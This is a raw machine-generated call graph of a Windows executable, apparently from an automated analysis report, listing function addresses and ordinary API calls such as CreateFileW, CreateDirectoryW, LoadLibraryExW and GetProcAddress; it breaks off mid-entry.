17249->17251 17249->17252 17253 7ff78da60eab 17250->17253 17254 7ff78da60f60 17251->17254 17252->17127 17255 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17253->17255 17256 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17254->17256 17255->17249 17256->17252 17260 7ff78da6ecad 17257->17260 17258 7ff78da6ecb2 17259 7ff78da64f78 memcpy_s 11 API calls 17258->17259 17262 7ff78da6524d 17258->17262 17265 7ff78da6ecbc 17259->17265 17260->17258 17260->17262 17263 7ff78da6ecfc 17260->17263 17261 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17261->17262 17262->17107 17262->17108 17263->17262 17264 7ff78da64f78 memcpy_s 11 API calls 17263->17264 17264->17265 17265->17261 17267 7ff78da58823 __std_exception_destroy 17266->17267 17268 7ff78da587a1 GetTokenInformation 17266->17268 17271 7ff78da5883c 17267->17271 17272 7ff78da58836 CloseHandle 17267->17272 17269 7ff78da587cd 17268->17269 17270 7ff78da587c2 GetLastError 17268->17270 17269->17267 17273 7ff78da587e9 GetTokenInformation 17269->17273 17270->17267 17270->17269 17271->16248 17272->17271 17273->17267 17274 7ff78da5880c 17273->17274 17274->17267 17275 7ff78da58816 ConvertSidToStringSidW 17274->17275 17275->17267 17277 7ff78da5c8c0 17276->17277 17278 7ff78da52b74 GetCurrentProcessId 17277->17278 17279 7ff78da526b0 48 API calls 17278->17279 17280 7ff78da52bc7 17279->17280 17281 7ff78da64c48 48 API calls 17280->17281 17282 7ff78da52c10 MessageBoxW 17281->17282 17283 7ff78da5c5c0 _log10_special 8 API calls 17282->17283 17284 7ff78da52c40 17283->17284 17284->16259 17286 7ff78da525e5 17285->17286 17287 7ff78da64c48 48 API calls 17286->17287 17288 7ff78da52604 17287->17288 17288->16274 17334 7ff78da68804 17289->17334 17293 7ff78da581cc 17292->17293 17294 7ff78da59400 2 API calls 17293->17294 17295 7ff78da581eb 17294->17295 17296 7ff78da581f3 17295->17296 17297 7ff78da58206 ExpandEnvironmentStringsW 17295->17297 17298 7ff78da52810 49 API calls 17296->17298 17299 7ff78da5822c __std_exception_destroy 17297->17299 17323 7ff78da581ff __std_exception_destroy 17298->17323 17300 7ff78da58243 17299->17300 17301 7ff78da58230 17299->17301 17305 7ff78da582af 17300->17305 17306 7ff78da58251 GetDriveTypeW 17300->17306 17302 7ff78da52810 49 API calls 17301->17302 17302->17323 17303 7ff78da5c5c0 _log10_special 8 API calls 17304 7ff78da5839f 17303->17304 17304->16272 17324 7ff78da682a8 17304->17324 17472 7ff78da67e78 17305->17472 17309 7ff78da58285 17306->17309 17310 7ff78da582a0 17306->17310 17312 7ff78da52810 49 API calls 17309->17312 17465 7ff78da679dc 17310->17465 17311 7ff78da582c1 17314 7ff78da582c9 17311->17314 17317 7ff78da582dc 17311->17317 17312->17323 17315 7ff78da52810 49 API calls 17314->17315 17315->17323 17316 7ff78da5833e CreateDirectoryW 17319 7ff78da5834d GetLastError 17316->17319 17316->17323 17317->17316 17318 7ff78da526b0 48 API calls 17317->17318 17320 7ff78da58318 CreateDirectoryW 17318->17320 17321 7ff78da5835a GetLastError 17319->17321 17319->17323 17320->17317 17323->17303 17325 7ff78da682c8 17324->17325 17326 7ff78da682b5 17324->17326 17573 7ff78da67f2c 17325->17573 17327 7ff78da64f78 memcpy_s 11 API calls 17326->17327 17329 7ff78da682ba 17327->17329 17331 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17329->17331 17332 7ff78da682c6 17331->17332 17332->16276 17375 7ff78da715c8 17334->17375 17434 7ff78da71340 17375->17434 17455 7ff78da70348 EnterCriticalSection 17434->17455 17466 7ff78da67a2d 17465->17466 17467 7ff78da679fa 17465->17467 17466->17323 17467->17466 17484 7ff78da704e4 17467->17484 17470 7ff78da6a970 _isindst 17 API calls 17471 7ff78da67a5d 17470->17471 17473 7ff78da67e94 17472->17473 17474 7ff78da67f02 17472->17474 17473->17474 17476 7ff78da67e99 17473->17476 17518 7ff78da70830 17474->17518 17477 7ff78da67ece 17476->17477 17478 7ff78da67eb1 17476->17478 17501 7ff78da67cbc GetFullPathNameW 17477->17501 17493 7ff78da67c48 GetFullPathNameW 17478->17493 17483 7ff78da67ec6 __std_exception_destroy 17483->17311 17485 7ff78da704fb 17484->17485 17486 7ff78da704f1 17484->17486 17487 7ff78da64f78 memcpy_s 11 API calls 17485->17487 17486->17485 17490 7ff78da70517 17486->17490 17492 7ff78da70503 17487->17492 17488 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17489 7ff78da67a29 17488->17489 17489->17466 17489->17470 17490->17489 17491 7ff78da64f78 memcpy_s 11 API calls 17490->17491 17491->17492 17492->17488 17494 7ff78da67c6e GetLastError 17493->17494 17495 7ff78da67c84 17493->17495 17496 7ff78da64eec _fread_nolock 11 API calls 17494->17496 17497 7ff78da67c80 17495->17497 17500 7ff78da64f78 memcpy_s 11 API calls 17495->17500 17498 7ff78da67c7b 17496->17498 17497->17483 17499 7ff78da64f78 memcpy_s 11 API calls 17498->17499 17499->17497 17500->17497 17502 7ff78da67cef GetLastError 17501->17502 17506 7ff78da67d05 __std_exception_destroy 17501->17506 17503 7ff78da64eec _fread_nolock 11 API calls 17502->17503 17504 7ff78da67cfc 17503->17504 17505 7ff78da64f78 memcpy_s 11 API calls 17504->17505 17507 7ff78da67d01 17505->17507 17506->17507 17508 7ff78da67d5f GetFullPathNameW 17506->17508 17509 7ff78da67d94 17507->17509 17508->17502 17508->17507 17512 7ff78da67e08 memcpy_s 17509->17512 17513 7ff78da67dbd memcpy_s 17509->17513 17510 7ff78da67df1 17511 7ff78da64f78 memcpy_s 11 API calls 17510->17511 17517 7ff78da67df6 17511->17517 17512->17483 17513->17510 17513->17512 17515 7ff78da67e2a 17513->17515 17515->17512 17516 7ff78da64f78 memcpy_s 11 API calls 17515->17516 17516->17517 17521 7ff78da70640 17518->17521 17522 7ff78da7066b 17521->17522 17523 7ff78da70682 17521->17523 17524 7ff78da64f78 memcpy_s 11 API calls 17522->17524 17525 7ff78da706a7 17523->17525 17526 7ff78da70686 17523->17526 17528 7ff78da70670 17524->17528 17559 7ff78da6f628 17525->17559 17547 7ff78da707ac 17526->17547 17533 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17528->17533 17530 7ff78da706ac 17532 7ff78da7068f 17542 7ff78da7067b __std_exception_destroy 17533->17542 17537 7ff78da5c5c0 _log10_special 8 API calls 17540 7ff78da707a1 17537->17540 17540->17483 17542->17537 17548 7ff78da707f6 17547->17548 17549 7ff78da707c6 17547->17549 17550 7ff78da707e1 17548->17550 17551 7ff78da70801 GetDriveTypeW 17548->17551 17552 7ff78da64f58 _fread_nolock 11 API calls 17549->17552 17554 7ff78da5c5c0 _log10_special 8 API calls 17550->17554 17551->17550 17553 7ff78da707cb 17552->17553 17555 7ff78da64f78 memcpy_s 11 API calls 17553->17555 17556 7ff78da7068b 17554->17556 17557 7ff78da707d6 17555->17557 17556->17530 17556->17532 17560 7ff78da7a540 memcpy_s 17559->17560 17561 7ff78da6f65e GetCurrentDirectoryW 17560->17561 17562 7ff78da6f69c 17561->17562 17563 7ff78da6f675 17561->17563 17564 7ff78da6ec08 memcpy_s 11 API calls 17562->17564 17565 7ff78da5c5c0 _log10_special 8 API calls 17563->17565 17566 7ff78da6f6ab 17564->17566 17567 7ff78da6f709 17565->17567 17567->17530 17580 7ff78da70348 EnterCriticalSection 17573->17580 17582 7ff78da5455a 17581->17582 17583 7ff78da59400 2 API calls 17582->17583 17584 7ff78da5457f 17583->17584 17585 7ff78da5c5c0 _log10_special 8 API calls 17584->17585 17586 7ff78da545a7 17585->17586 17586->16311 17588 7ff78da57e1e 17587->17588 17589 7ff78da57f42 17588->17589 17590 7ff78da51c80 49 API calls 17588->17590 17592 7ff78da5c5c0 _log10_special 8 API calls 17589->17592 17591 7ff78da57ea5 17590->17591 17591->17589 17594 7ff78da51c80 49 API calls 17591->17594 17595 7ff78da54550 10 API calls 17591->17595 17596 7ff78da57efb 17591->17596 17593 7ff78da57f73 17592->17593 17593->16311 17594->17591 17595->17591 17597 7ff78da59400 2 API calls 17596->17597 17598 7ff78da57f13 CreateDirectoryW 17597->17598 17598->17589 17598->17591 17600 7ff78da51637 17599->17600 17601 7ff78da51613 17599->17601 17603 7ff78da545b0 108 API calls 17600->17603 17720 7ff78da51050 17601->17720 17605 7ff78da5164b 17603->17605 17604 7ff78da51618 17606 7ff78da5162e 17604->17606 17609 7ff78da52710 54 API calls 17604->17609 17607 7ff78da51653 17605->17607 17608 7ff78da51682 17605->17608 17606->16311 17610 7ff78da64f78 memcpy_s 11 API calls 17607->17610 17611 7ff78da545b0 108 API calls 17608->17611 17609->17606 17613 7ff78da51658 17610->17613 17612 7ff78da51696 17611->17612 17614 7ff78da5169e 17612->17614 17615 7ff78da516b8 17612->17615 17616 7ff78da52910 54 API calls 17613->17616 17617 7ff78da52710 54 API calls 17614->17617 17618 7ff78da60744 73 API calls 17615->17618 17619 7ff78da51671 17616->17619 17620 7ff78da516ae 17617->17620 17621 7ff78da516cd 17618->17621 17619->16311 17624 7ff78da600bc 74 API calls 17620->17624 17622 7ff78da516f9 17621->17622 17623 7ff78da516d1 17621->17623 17626 7ff78da51717 17622->17626 17627 7ff78da516ff 17622->17627 17625 7ff78da64f78 memcpy_s 11 API calls 17623->17625 17628 7ff78da51829 17624->17628 17629 7ff78da516d6 17625->17629 17632 7ff78da51739 17626->17632 17643 7ff78da51761 17626->17643 17698 7ff78da51210 17627->17698 17628->16311 17631 7ff78da52910 54 API calls 17629->17631 17638 7ff78da516ef __std_exception_destroy 17631->17638 17634 7ff78da64f78 memcpy_s 11 API calls 17632->17634 17633 7ff78da600bc 74 API calls 17633->17620 17635 7ff78da5173e 17634->17635 17636 7ff78da52910 54 API calls 17635->17636 17636->17638 17637 7ff78da6040c _fread_nolock 53 API calls 17637->17643 17638->17633 17639 7ff78da517da 17640 7ff78da64f78 memcpy_s 11 API calls 17639->17640 17642 7ff78da517ca 17640->17642 17646 7ff78da52910 54 API calls 17642->17646 17643->17637 17643->17638 17643->17639 17644 7ff78da517c5 17643->17644 17751 7ff78da60b4c 17643->17751 17645 7ff78da64f78 memcpy_s 11 API calls 17644->17645 17645->17642 17646->17638 17648 7ff78da57134 17647->17648 17650 7ff78da5717b 17647->17650 17648->17650 17784 7ff78da65094 17648->17784 17650->16311 17652 7ff78da54191 17651->17652 17653 7ff78da544d0 49 API calls 17652->17653 17654 7ff78da541cb 17653->17654 17655 7ff78da544d0 49 API calls 17654->17655 17656 7ff78da541db 17655->17656 17657 7ff78da5422c 17656->17657 17658 7ff78da541fd 17656->17658 17660 7ff78da54100 51 API calls 17657->17660 17815 7ff78da54100 17658->17815 17661 7ff78da5422a 17660->17661 17662 7ff78da5428c 17661->17662 17663 7ff78da54257 17661->17663 17664 7ff78da54100 51 API calls 17662->17664 17822 7ff78da57ce0 17663->17822 17667 7ff78da542b0 17664->17667 17669 7ff78da54100 51 API calls 17667->17669 17683 7ff78da54302 17667->17683 17668 7ff78da52710 54 API calls 17673 7ff78da54287 17668->17673 17675 7ff78da542d9 17669->17675 17670 7ff78da54383 17672 7ff78da51950 115 API calls 17670->17672 17671 7ff78da5c5c0 _log10_special 8 API calls 17674 7ff78da54425 17671->17674 17676 7ff78da5438d 17672->17676 17673->17671 17674->16311 17677 7ff78da54100 51 API calls 17675->17677 17675->17683 17678 7ff78da543ee 17676->17678 17679 7ff78da54395 17676->17679 17677->17683 17681 7ff78da52710 54 API calls 17678->17681 17848 7ff78da51840 17679->17848 17680 7ff78da5437c 17680->17679 17684 7ff78da54307 17680->17684 17681->17684 17683->17670 17683->17680 17683->17684 17686 7ff78da5436b 17683->17686 17687 7ff78da52710 54 API calls 17684->17687 17690 7ff78da52710 54 API calls 17686->17690 17687->17673 17688 7ff78da543ac 17691 7ff78da52710 54 API calls 17688->17691 17689 7ff78da543c2 17692 7ff78da51600 118 API calls 17689->17692 17690->17684 17691->17673 17693 7ff78da543d0 17692->17693 17693->17673 17694 7ff78da52710 54 API calls 17693->17694 17694->17673 17696 7ff78da51c80 49 API calls 17695->17696 17697 7ff78da54464 17696->17697 17697->16311 17699 7ff78da51268 17698->17699 17700 7ff78da51297 17699->17700 17701 7ff78da5126f 17699->17701 17704 7ff78da512d4 17700->17704 17705 7ff78da512b1 17700->17705 17702 7ff78da52710 54 API calls 17701->17702 17703 7ff78da51282 17702->17703 17703->17638 17709 7ff78da512e6 17704->17709 17719 7ff78da51309 memcpy_s 17704->17719 17706 7ff78da64f78 memcpy_s 11 API calls 17705->17706 17707 7ff78da512b6 17706->17707 17708 7ff78da52910 54 API calls 17707->17708 17715 7ff78da512cf __std_exception_destroy 17708->17715 17710 7ff78da64f78 memcpy_s 11 API calls 17709->17710 17711 7ff78da512eb 17710->17711 17713 7ff78da52910 54 API calls 17711->17713 17712 7ff78da6040c _fread_nolock 53 API calls 17712->17719 17713->17715 17714 7ff78da60180 37 API calls 17714->17719 17715->17638 17716 7ff78da513cf 17717 7ff78da52710 54 API calls 17716->17717 17717->17715 17718 7ff78da60b4c 76 API calls 17718->17719 17719->17712 17719->17714 17719->17715 17719->17716 17719->17718 17721 7ff78da545b0 108 API calls 17720->17721 17722 7ff78da5108c 17721->17722 17723 7ff78da510a9 17722->17723 17724 7ff78da51094 17722->17724 17725 7ff78da60744 73 API calls 17723->17725 17726 7ff78da52710 54 API calls 17724->17726 17727 7ff78da510bf 17725->17727 17732 7ff78da510a4 __std_exception_destroy 17726->17732 17728 7ff78da510c3 17727->17728 17729 7ff78da510e6 17727->17729 17730 7ff78da64f78 memcpy_s 11 API calls 17728->17730 17734 7ff78da510f7 17729->17734 17735 7ff78da51122 17729->17735 17731 7ff78da510c8 17730->17731 17733 7ff78da52910 54 API calls 17731->17733 17732->17604 17741 7ff78da510e1 __std_exception_destroy 17733->17741 17737 7ff78da64f78 memcpy_s 11 API calls 17734->17737 17736 7ff78da51129 17735->17736 17745 7ff78da5113c 17735->17745 17738 7ff78da51210 92 API calls 17736->17738 17739 7ff78da51100 17737->17739 17738->17741 17742 7ff78da52910 54 API calls 17739->17742 17740 7ff78da600bc 74 API calls 17743 7ff78da511b4 17740->17743 17741->17740 17742->17741 17743->17732 17755 7ff78da546e0 17743->17755 17744 7ff78da6040c _fread_nolock 53 API calls 17744->17745 17745->17741 17745->17744 17747 7ff78da511ed 17745->17747 17748 7ff78da64f78 memcpy_s 11 API calls 17747->17748 17749 7ff78da511f2 17748->17749 17750 7ff78da52910 54 API calls 17749->17750 17750->17741 17752 7ff78da60b7c 17751->17752 17769 7ff78da6089c 17752->17769 17754 7ff78da60b9a 17754->17643 17756 7ff78da546f0 17755->17756 17757 7ff78da59400 2 API calls 17756->17757 17759 7ff78da5471b 17757->17759 17758 7ff78da5478e 17761 7ff78da5c5c0 _log10_special 8 API calls 17758->17761 17759->17758 17760 7ff78da59400 2 API calls 17759->17760 17762 7ff78da54736 17760->17762 17763 7ff78da547a9 17761->17763 17762->17758 17764 7ff78da5473b CreateSymbolicLinkW 17762->17764 17763->17732 17764->17758 17765 7ff78da54765 17764->17765 17765->17758 17766 7ff78da5476e GetLastError 17765->17766 17766->17758 17767 7ff78da54779 17766->17767 17770 7ff78da608e9 17769->17770 17771 7ff78da608bc 17769->17771 17770->17754 17771->17770 17772 7ff78da608c6 17771->17772 17773 7ff78da608f1 17771->17773 17775 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 17772->17775 17776 7ff78da607dc 17773->17776 17775->17770 17783 7ff78da654dc EnterCriticalSection 17776->17783 17785 7ff78da650ce 17784->17785 17786 7ff78da650a1 17784->17786 17788 7ff78da650f1 17785->17788 17790 7ff78da6510d 17785->17790 17787 7ff78da64f78 memcpy_s 11 API calls 17786->17787 17796 7ff78da65058 17786->17796 17791 7ff78da650ab 17787->17791 17789 7ff78da64f78 memcpy_s 11 API calls 17788->17789 17792 7ff78da650f6 17789->17792 17799 7ff78da64fbc 17790->17799 17794 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17791->17794 17795 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17792->17795 17797 7ff78da650b6 17794->17797 17798 7ff78da65101 17795->17798 17796->17648 17797->17648 17798->17648 17800 7ff78da64fe0 17799->17800 17806 7ff78da64fdb 17799->17806 17801 7ff78da6b1c0 _CreateFrameInfo 45 API calls 17800->17801 17800->17806 17802 7ff78da64ffb 17801->17802 17807 7ff78da6d9f4 17802->17807 17806->17798 17808 7ff78da6da09 17807->17808 17809 7ff78da6501e 17807->17809 17808->17809 17810 7ff78da73374 45 API calls 17808->17810 17811 7ff78da6da60 17809->17811 17810->17809 17812 7ff78da6da88 17811->17812 17813 7ff78da6da75 17811->17813 17812->17806 17813->17812 17814 7ff78da726c0 45 API calls 17813->17814 17814->17812 17816 7ff78da54126 17815->17816 17817 7ff78da649f4 49 API calls 17816->17817 17818 7ff78da5414c 17817->17818 17819 7ff78da5415d 17818->17819 17820 7ff78da54550 10 API calls 17818->17820 17819->17661 17821 7ff78da5416f 17820->17821 17821->17661 17823 7ff78da57cf5 17822->17823 17824 7ff78da545b0 108 API calls 17823->17824 17825 7ff78da57d1b 17824->17825 17826 7ff78da57d42 17825->17826 17827 7ff78da545b0 108 API calls 17825->17827 17829 7ff78da5c5c0 _log10_special 8 API calls 17826->17829 17828 7ff78da57d32 17827->17828 17830 7ff78da57d4c 17828->17830 17831 7ff78da57d3d 17828->17831 17832 7ff78da54267 17829->17832 17852 7ff78da60154 17830->17852 17833 7ff78da600bc 74 API calls 17831->17833 17832->17668 17832->17673 17833->17826 17835 7ff78da57daf 17836 7ff78da600bc 74 API calls 17835->17836 17837 7ff78da57dd7 17836->17837 17838 7ff78da6040c _fread_nolock 53 API calls 17846 7ff78da57d51 17838->17846 17840 7ff78da57db6 17841 7ff78da60180 37 API calls 17840->17841 17843 7ff78da57db1 17841->17843 17842 7ff78da60b4c 76 API calls 17842->17846 17843->17835 17858 7ff78da67388 17843->17858 17844 7ff78da60180 37 API calls 17844->17846 17846->17835 17846->17838 17846->17840 17846->17842 17846->17843 17846->17844 17847 7ff78da60154 37 API calls 17846->17847 17847->17846 17850 7ff78da518d5 17848->17850 17851 7ff78da51865 17848->17851 17849 7ff78da65094 45 API calls 17849->17851 17850->17688 17850->17689 17851->17849 17851->17850 17853 7ff78da6015d 17852->17853 17854 7ff78da6016d 17852->17854 17855 7ff78da64f78 memcpy_s 11 API calls 17853->17855 17854->17846 17856 7ff78da60162 17855->17856 17857 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17856->17857 17857->17854 17859 7ff78da67390 17858->17859 17860 7ff78da673ac 17859->17860 17861 7ff78da673cd 17859->17861 17879 7ff78da65f38 17878->17879 17880 7ff78da65f5e 17879->17880 17883 7ff78da65f91 17879->17883 17881 7ff78da64f78 memcpy_s 11 API calls 17880->17881 17882 7ff78da65f63 17881->17882 17886 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 17882->17886 17884 7ff78da65f97 17883->17884 17885 7ff78da65fa4 17883->17885 17887 7ff78da64f78 memcpy_s 11 API calls 17884->17887 17897 7ff78da6ac98 17885->17897 17889 7ff78da54606 17886->17889 17887->17889 17889->16336 17910 7ff78da70348 EnterCriticalSection 17897->17910 18271 7ff78da67968 18270->18271 18274 7ff78da67444 18271->18274 18273 7ff78da67981 18273->16346 18275 7ff78da6748e 18274->18275 18276 7ff78da6745f 18274->18276 18284 7ff78da654dc EnterCriticalSection 18275->18284 18277 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 18276->18277 18279 7ff78da6747f 18277->18279 18279->18273 18286 7ff78da5feb3 18285->18286 18287 7ff78da5fee1 18285->18287 18288 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 18286->18288 18290 7ff78da5fed3 18287->18290 18295 7ff78da654dc EnterCriticalSection 18287->18295 18288->18290 18290->16350 18297 7ff78da5cb62 RtlLookupFunctionEntry 18296->18297 18298 7ff78da5cb78 RtlVirtualUnwind 18297->18298 18299 7ff78da5c97b 18297->18299 18298->18297 18298->18299 18300 7ff78da5c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18299->18300 18302 7ff78da545b0 108 API calls 18301->18302 18303 7ff78da51493 18302->18303 18304 7ff78da5149b 18303->18304 18305 7ff78da514bc 18303->18305 18306 7ff78da52710 54 API calls 18304->18306 18307 7ff78da60744 73 API calls 18305->18307 18308 7ff78da514ab 18306->18308 18309 7ff78da514d1 18307->18309 18308->16392 18310 7ff78da514f8 18309->18310 18311 7ff78da514d5 18309->18311 18314 7ff78da51508 18310->18314 18315 7ff78da51532 18310->18315 18312 7ff78da64f78 memcpy_s 11 API calls 18311->18312 18313 7ff78da514da 18312->18313 18316 7ff78da52910 54 API calls 18313->18316 18317 7ff78da64f78 memcpy_s 11 API calls 18314->18317 18318 7ff78da51538 18315->18318 18326 7ff78da5154b 18315->18326 18323 7ff78da514f3 __std_exception_destroy 18316->18323 18319 7ff78da51510 18317->18319 18320 7ff78da51210 92 API calls 18318->18320 18321 7ff78da52910 54 API calls 18319->18321 18320->18323 18321->18323 18322 7ff78da600bc 74 API calls 18324 7ff78da515c4 18322->18324 18323->18322 18324->16392 18325 7ff78da6040c _fread_nolock 53 API calls 18325->18326 18326->18323 18326->18325 18327 7ff78da515d6 18326->18327 18328 7ff78da64f78 memcpy_s 11 API calls 18327->18328 18329 7ff78da515db 18328->18329 18330 7ff78da52910 54 API calls 18329->18330 18330->18323 18332 7ff78da59400 2 API calls 18331->18332 18333 7ff78da59084 LoadLibraryExW 18332->18333 18334 7ff78da590a3 __std_exception_destroy 18333->18334 18334->16426 18408 7ff78da56365 18407->18408 18409 7ff78da51c80 49 API calls 18408->18409 18410 7ff78da563a1 18409->18410 18411 7ff78da563cd 18410->18411 18412 7ff78da563aa 18410->18412 18414 7ff78da54620 49 API calls 18411->18414 18413 7ff78da52710 54 API calls 18412->18413 18431 7ff78da563c3 18413->18431 18415 7ff78da563e5 18414->18415 18416 7ff78da56403 18415->18416 18417 7ff78da52710 54 API calls 18415->18417 18418 7ff78da54550 10 API calls 18416->18418 18417->18416 18420 7ff78da5640d 18418->18420 18419 7ff78da5c5c0 _log10_special 8 API calls 18421 7ff78da5336e 18419->18421 18422 7ff78da5641b 18420->18422 18423 7ff78da59070 3 API calls 18420->18423 18421->16461 18438 7ff78da564f0 18421->18438 18424 7ff78da54620 49 API calls 18422->18424 18423->18422 18425 7ff78da56434 18424->18425 18426 7ff78da56459 18425->18426 18427 7ff78da56439 18425->18427 18429 7ff78da59070 3 API calls 18426->18429 18428 7ff78da52710 54 API calls 18427->18428 18428->18431 18430 7ff78da56466 18429->18430 18432 7ff78da564b1 18430->18432 18433 7ff78da56472 18430->18433 18431->18419 18497 7ff78da55820 GetProcAddress 18432->18497 18434 7ff78da59400 2 API calls 18433->18434 18436 7ff78da5648a GetLastError 18434->18436 18437 7ff78da52c50 51 API calls 18436->18437 18437->18431 18587 7ff78da553f0 18438->18587 18440 7ff78da56516 18441 7ff78da5651e 18440->18441 18442 7ff78da5652f 18440->18442 18443 7ff78da52710 54 API calls 18441->18443 18594 7ff78da54c80 18442->18594 18449 7ff78da5652a 18443->18449 18446 7ff78da5653b 18448 7ff78da52710 54 API calls 18446->18448 18447 7ff78da5654c 18450 7ff78da5655c 18447->18450 18452 7ff78da5656d 18447->18452 18448->18449 18449->16463 18451 7ff78da52710 54 API calls 18450->18451 18451->18449 18453 7ff78da5658c 18452->18453 18454 7ff78da5659d 18452->18454 18455 7ff78da52710 54 API calls 18453->18455 18456 7ff78da565ac 18454->18456 18457 7ff78da565bd 18454->18457 18455->18449 18476 7ff78da56060 18475->18476 18476->18476 18477 7ff78da56089 18476->18477 18483 7ff78da560a0 __std_exception_destroy 18476->18483 18478 7ff78da52710 54 API calls 18477->18478 18479 7ff78da56095 18478->18479 18479->16465 18480 7ff78da561ab 18480->16465 18481 7ff78da51470 116 API calls 18481->18483 18482 7ff78da52710 54 API calls 18482->18483 18483->18480 18483->18481 18483->18482 18498 7ff78da5586f GetProcAddress 18497->18498 18499 7ff78da55842 GetLastError 18497->18499 18501 7ff78da5588b GetLastError 18498->18501 18502 7ff78da5589a GetProcAddress 18498->18502 18500 7ff78da5584f 18499->18500 18503 7ff78da52c50 51 API calls 18500->18503 18501->18500 18504 7ff78da558c5 GetProcAddress 18502->18504 18505 7ff78da558b6 GetLastError 18502->18505 18506 7ff78da55864 18503->18506 18507 7ff78da558f3 GetProcAddress 18504->18507 18508 7ff78da558e1 GetLastError 18504->18508 18505->18500 18506->18431 18509 7ff78da5590f GetLastError 18507->18509 18510 7ff78da55921 GetProcAddress 18507->18510 18508->18500 18509->18500 18589 7ff78da5541c 18587->18589 18588 7ff78da55424 18588->18440 18589->18588 18591 7ff78da555c4 18589->18591 18618 7ff78da66b14 18589->18618 18590 7ff78da55787 __std_exception_destroy 18590->18440 18591->18590 18592 7ff78da547c0 47 API calls 18591->18592 18592->18591 18595 7ff78da54cb0 18594->18595 18596 7ff78da5c5c0 _log10_special 8 API calls 18595->18596 18597 7ff78da54d1a 18596->18597 18597->18446 18597->18447 18619 7ff78da66b44 18618->18619 18622 7ff78da66010 18619->18622 18621 7ff78da66b74 18621->18589 18623 7ff78da66053 18622->18623 18624 7ff78da66041 18622->18624 18626 7ff78da6609d 18623->18626 18628 7ff78da66060 18623->18628 18625 7ff78da64f78 memcpy_s 11 API calls 18624->18625 18627 7ff78da66046 18625->18627 18629 7ff78da660b8 18626->18629 18630 7ff78da64830 45 API calls 18626->18630 18632 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 18627->18632 18633 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 18628->18633 18634 7ff78da660da 18629->18634 18643 7ff78da66a9c 18629->18643 18630->18629 18638 7ff78da66051 18632->18638 18633->18638 18635 7ff78da6617b 18634->18635 18636 7ff78da64f78 memcpy_s 11 API calls 18634->18636 18637 7ff78da64f78 memcpy_s 11 API calls 18635->18637 18635->18638 18639 7ff78da66170 18636->18639 18640 7ff78da66226 18637->18640 18638->18621 18641 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 18639->18641 18642 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 18640->18642 18641->18635 18642->18638 18644 7ff78da66ad6 18643->18644 18645 7ff78da66abf 18643->18645 18647 7ff78da66ac4 18644->18647 18654 7ff78da70008 18644->18654 18649 7ff78da6ffd8 18645->18649 18647->18629 18650 7ff78da6b1c0 _CreateFrameInfo 45 API calls 18649->18650 18651 7ff78da6ffe1 18650->18651 18655 7ff78da64fbc 45 API calls 18654->18655 18656 7ff78da70041 18655->18656 18660 7ff78da7004d 18656->18660 18661 7ff78da72eb0 18656->18661 18695->16469 18697 7ff78da6b1c0 _CreateFrameInfo 45 API calls 18696->18697 18698 7ff78da6a451 18697->18698 18701 7ff78da6a574 18698->18701 18710 7ff78da736c0 18701->18710 18736 7ff78da73678 18710->18736 18741 7ff78da70348 EnterCriticalSection 18736->18741 18745 7ff78da65698 18746 7ff78da656cf 18745->18746 18747 7ff78da656b2 18745->18747 18746->18747 18748 7ff78da656e2 CreateFileW 18746->18748 18749 7ff78da64f58 _fread_nolock 11 API calls 18747->18749 18750 7ff78da6574c 18748->18750 18751 7ff78da65716 18748->18751 18752 7ff78da656b7 18749->18752 18796 7ff78da65c74 18750->18796 18770 7ff78da657ec GetFileType 18751->18770 18755 7ff78da64f78 memcpy_s 11 API calls 18752->18755 18756 7ff78da656bf 18755->18756 18759 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 18756->18759 18765 7ff78da656ca 18759->18765 18760 7ff78da6572b CloseHandle 18760->18765 18761 7ff78da65741 CloseHandle 18761->18765 18762 7ff78da65755 18766 7ff78da64eec _fread_nolock 11 API calls 18762->18766 18763 7ff78da65780 18817 7ff78da65a34 18763->18817 18769 7ff78da6575f 18766->18769 18769->18765 18771 7ff78da658f7 18770->18771 18772 7ff78da6583a 18770->18772 18774 7ff78da658ff 18771->18774 18775 7ff78da65921 18771->18775 18773 7ff78da65866 GetFileInformationByHandle 18772->18773 18777 7ff78da65b70 21 API calls 18772->18777 18778 7ff78da6588f 18773->18778 18779 7ff78da65912 GetLastError 18773->18779 18774->18779 18780 7ff78da65903 18774->18780 18776 7ff78da65944 PeekNamedPipe 18775->18776 18794 7ff78da658e2 18775->18794 18776->18794 18782 7ff78da65854 18777->18782 18783 7ff78da65a34 51 API calls 18778->18783 18781 7ff78da64eec _fread_nolock 11 API calls 18779->18781 18784 7ff78da64f78 memcpy_s 11 API calls 18780->18784 18781->18794 18782->18773 18782->18794 18786 7ff78da6589a 18783->18786 18784->18794 18785 7ff78da5c5c0 _log10_special 8 API calls 18788 7ff78da65724 18785->18788 18834 7ff78da65994 18786->18834 18788->18760 18788->18761 18790 7ff78da65994 10 API calls 18791 7ff78da658b9 18790->18791 18792 7ff78da65994 10 API calls 18791->18792 18793 7ff78da658ca 18792->18793 18793->18794 18795 7ff78da64f78 memcpy_s 11 API calls 18793->18795 18794->18785 18795->18794 18797 7ff78da65caa 18796->18797 18798 7ff78da64f78 memcpy_s 11 API calls 18797->18798 18816 7ff78da65d42 __std_exception_destroy 18797->18816 18800 7ff78da65cbc 18798->18800 18799 7ff78da5c5c0 _log10_special 8 API calls 18801 7ff78da65751 18799->18801 18802 7ff78da64f78 memcpy_s 11 API calls 18800->18802 18801->18762 18801->18763 18803 7ff78da65cc4 18802->18803 18804 7ff78da67e78 45 API calls 18803->18804 18805 7ff78da65cd9 18804->18805 18806 7ff78da65ceb 18805->18806 18807 7ff78da65ce1 18805->18807 18809 7ff78da64f78 memcpy_s 11 API calls 18806->18809 18808 